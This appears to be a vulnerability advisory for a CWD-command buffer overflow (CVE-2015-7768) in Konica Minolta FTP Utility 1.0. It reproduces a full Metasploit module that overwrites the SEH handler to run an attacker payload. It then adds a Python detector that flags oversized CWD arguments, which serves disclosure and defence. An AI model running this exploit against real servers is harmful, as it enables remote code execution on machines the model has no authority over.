Konica Minolta FTP Utility Buffer Overflow Vulnerability (CVE-2015-7768)
Published: 2015-09-11
Updated: 2015-10-10
Affected systems:
Konica Minolta FTP Utility 1.0
Description:
CVE(CAN) ID: CVE-2015-7768
KONICA MINOLTA FTP Utility is software used with KONICA MINOLTA copiers to transfer scanned documents directly to a computer.
Konica Minolta FTP Utility 1.0 fails to check the input size when parsing the CWD command, so its implementation contains a buffer overflow; a remote attacker can send an over-long CWD command to exploit this flaw and execute arbitrary code.
<*Source: Shankar Damodaran
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users bear all risk themselves!
Shankar Damodaran () provided the following test method:
##
# This module requires Metasploit:
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow',
      'Description'    => %q{
        This module exploits an SEH overflow in Konica Minolta FTP Server 1.00.
        Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which
        leads to an SEH overflow. Konica FTP allows anonymous access by default; valid
        credentials are typically unnecessary to exploit this vulnerability.
      },
      'Author'         =>
        [
          'Shankar Damodaran', # stack buffer overflow dos p.o.c
          'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # seh overflow, metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'EDB', '37908' ] # Exploit-DB entry; the reference key is 'EDB', not 'EBD'
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1500,
          'BadChars'    => "\x00\x0a\x2f\x5c",
          'DisableNops' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows 7 SP1 x86',
            {
              'Ret'    => 0x12206d9d, # ppr (pop/pop/ret) - KMFtpCM.dll
              'Offset' => 1037
            }
          ]
        ],
      'DisclosureDate' => 'Aug 23 2015',
      'DefaultTarget'  => 0))
  end

  # Fingerprint the service by its banner; the vulnerable build announces "Version 1.00".
  def check
    connect
    disconnect
    if banner =~ /FTP Utility FTP server \(Version 1\.00\)/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    connect_login
    buf = rand_text(target['Offset'])
    buf << generate_seh_record(target.ret)
    buf << payload.encoded
    buf << rand_text(3000)
    print_status("Sending exploit buffer...")
    send_cmd(['CWD', buf], false) # this will automatically put a space between 'CWD' and our attack string
    handler
    disconnect
  end
end
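From the defender's side, the distinguishing feature of this attack is a CWD argument thousands of bytes long (the module places its SEH record at offset 1037 and pads to well over 4 KB), which no legitimate scan-to-folder path ever approaches. The following Python script is an added example, not part of this advisory or of the Metasploit module: it classifies FTP control-channel command lines and flags CWD arguments by length and content. The sample session and the 256-byte warning threshold are constructed assumptions; the 1037-byte alert length is taken from the module's Offset.

```python
import re

# Offset at which the module places the SEH record (from the advisory's module).
CWD_ALERT_LENGTH = 1037
# Assumed threshold: a path argument this long is already suspicious.
CWD_WARN_LENGTH = 256

# verb (3-4 letters), optional single space, optional argument; bytes so raw
# captures with non-ASCII content can be inspected without decoding errors.
FTP_CMD_RE = re.compile(rb"^(?P<verb>[A-Za-z]{3,4})(?: (?P<arg>.*))?$", re.DOTALL)


def inspect_ftp_command(line: bytes) -> dict:
    """Classify one FTP control-channel command line (CRLF optional)."""
    m = FTP_CMD_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return {"verb": None, "arg_len": 0, "severity": "malformed"}
    verb = m.group("verb").upper().decode("ascii")
    arg = m.group("arg") or b""
    severity = "ok"
    if verb == "CWD":
        non_printable = any(b < 0x20 or b > 0x7E for b in arg)
        if len(arg) >= CWD_ALERT_LENGTH:
            severity = "alert"          # far beyond any real path: overflow attempt
        elif len(arg) >= CWD_WARN_LENGTH or non_printable:
            severity = "warn"           # oversized or binary path: worth a look
    return {"verb": verb, "arg_len": len(arg), "severity": severity}


def scan_session(lines):
    """Return the findings for every command line that is not plain 'ok'."""
    return [r for r in map(inspect_ftp_command, lines) if r["severity"] != "ok"]


# Constructed sample session: anonymous login, one benign CWD, one CWD shaped
# like the module's buffer (1037 bytes + 8-byte SEH record + 1500-byte payload).
SAMPLE_SESSION = [
    b"USER anonymous\r\n",
    b"PASS guest@example.invalid\r\n",
    b"CWD /scans/2015-09\r\n",
    b"CWD " + b"A" * 1037 + b"B" * 8 + b"C" * 1500 + b"\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print(finding)
```

The same rule ports directly to an IDS signature or FTP proxy: reject or log any CWD whose argument exceeds the warning length before it reaches the utility.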
Recommendations:
Vendor patch:
konicaminolta
-------------
The vendor has not yet released a patch or upgrade program; we recommend that users of this software monitor the vendor's homepage for the latest version: